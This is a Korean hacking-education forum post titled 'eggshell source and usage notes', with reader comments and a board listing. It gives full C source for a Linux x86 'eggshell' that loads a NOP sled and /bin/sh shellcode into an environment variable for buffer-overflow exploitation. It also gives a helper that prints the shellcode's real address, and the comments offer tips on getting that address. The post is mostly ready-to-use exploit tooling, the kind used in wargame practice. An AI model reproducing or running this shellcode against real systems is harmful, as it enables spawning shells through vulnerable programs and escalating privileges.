1586, 39/80 회원가입  로그인  
   craft
   http://leewon21wkd.blog.me/
   eggshell 소스 및 사용시 유의사항

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1939 [복사]


#include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
int main(int argc, char *argv[]) {
        char *buff, *ptr, *egg;
        long *addr_ptr, addr;
        int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
        int i, eggsize=DEFAULT_EGG_SIZE;
        if (argc > 1) bsize   = atoi(argv[1]);
        if (argc > 2) offset  = atoi(argv[2]);
        if (argc > 3) eggsize = atoi(argv[3]);
        if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
        }
        if (!(egg = malloc(eggsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
        }
        addr = get_esp() - offset;
        printf("Using address: 0x%x\n", addr);
        ptr = buff;
        addr_ptr = (long *) ptr;
        for (i = 0; i < bsize; i+=4)
        {
                if(i == 1040)
                {
                        *(addr_ptr++) = 0x1234567;
                }
                else
                        *(addr_ptr++) = addr;
}
        ptr = egg;
        for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
                *(ptr++) = NOP;
        for (i = 0; i < strlen(shellcode); i++)
                *(ptr++) = shellcode[i];
        buff[bsize - 1] = '\0';
        egg[eggsize - 1] = '\0';
        memcpy(egg,"EGG=",4);
        putenv(egg);
        memcpy(buff,"RET=",4);
        putenv(buff);
        system("/bin/bash");
}

===========================================================================

이 프로그램을 컴파일하고 실행시키고 출력된 주소값을 사용하면 제대로 실행되지 않습니다.
그래서 저는 에그쉘을 거짓말쟁이라고 부르죠
진짜 에그쉘의 주소를 얻기 위해서는 컴파일된 위의 에그쉘을 실행시킨 후

#include <stdio.h>
int main()
{
        printf("Addr = %p\n", getenv("EGG"));
}

위의 코드를 컴파일 하시고 실행시키면 에그쉘의 진짜 주소가 출력됩니다.

  Hit : 10982     Date : 2012/01/27 03:37



    
sohun5013 음.. 역시 에그쉘이 코드 주소를 고정시켜주는 역할을 하는 거군요.. 2012/01/27  
kjwon15 저 밑의 코드 필요없이
printf '%p\n' $EGG
하면 될거같습니다.
여기서 printf는 함수가 아니라 리눅스 내부의 명령어입니다.
2012/01/28  
craft kjwon15 // 그렇쿤요 조언 감사합니다!ㅋㅋ 2012/01/28  
sohun5013 $ printf '%p\n' $SHELLCODE
bash: printf: `p': invalid format character
라고 뜨는데요;;
2012/01/28  
chaser1963 kjwon15님
printf가 리눅스 내부명령어라고 말씀하시는건 시스템콜이라는건가요 ?
라이브러리로 알고있는데...
2012/02/05  
BrokenPipe chaser1963//
shell 명령어요
C언어 함수말고 리눅스 프롬프트 상에서 printf "abc" 쳐보시면
echo "abc" 랑 동일한 효과를 내요
2012/02/05  
826   [자작] 운영체제 - 프로세스 편.(필기내용이에요...자세하게 적지못했음..)     freesic
06/03 7985
825   [자작] 외전 2-visual studio 2010 express 다운받기!!![6]     whdgusdl1220
08/18 7145
824   [자작] 외전(?) -컴파일러 소개[2]     whdgusdl1220
08/16 6722
823   [자작] 왜 Little Endian 인가 ?[6]     우느님
03/09 7279
822   [자작]초보자를 위한 C 언어 강좌 모음[2]     kevin0960
08/15 6973
821   [자작]Anchor 태그와 CSS속성을 이용한 공격과 그 방어     ic_chip
01/22 7615
820   [자작]적절한 네트워크 정리[1]     우느님
01/03 7481
819   [자작]윈도우!! 숨겨진 너의 모습을 보여줘!!! - 2 -[7]     별빛을담아
02/05 9050
818   [자작]윈도우!! 숨겨진 너의 모습을 보여줘!!! - 3 -[11]     별빛을담아
02/09 8812
817   [자작]윈도우!! 숨겨진 너의 모습을 보여줘!!! - 4 -[18]     별빛을담아
02/17 7758
816   [자작]윈도우!! 숨겨진 너의 모습을 보여줘!!! - 5 -[6]     별빛을담아
03/02 7375
815   [자작]윈도우!! 숨겨진 너의 모습을 보여줘!!! - 6 -[14]     별빛을담아
03/10 8582
814   [자작]윈도우!! 숨겨진 너의 모습을 보여줘!!! - 제 1회 -[16]     별빛을담아
02/02 9381
813   [자작]윈도우!! 숨겨진 너의 모습을 보여줘!!!(Intro)[8]     별빛을담아
02/01 6940
812   [자작]C/C++프로그래머가 보는 웹세상[4]     qa22ahj
07/12 6344
811   [자작]프로세스모니터Operation필터     havu
01/10 12481
810   [자작]c언어 <포인터> 캐쉽게 설명해드려요~[6]     우느님
01/07 7173
809   [자작]c언어 <포인터> 캐쉽게 설명해드려요~ 2[5]     우느님
01/07 7181
808   [자작]c언어 <포인터> 캐쉽게 설명해드려요~ 3 (수정)[8]     우느님
01/07 7432
807   [자작]C언어와 JAVA 공부를 효율적으로 하는 간단한 팁..[1]     faustl
11/01 9263
[1]..[31][32][33][34][35][36][37][38] 39 [40]..[80]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org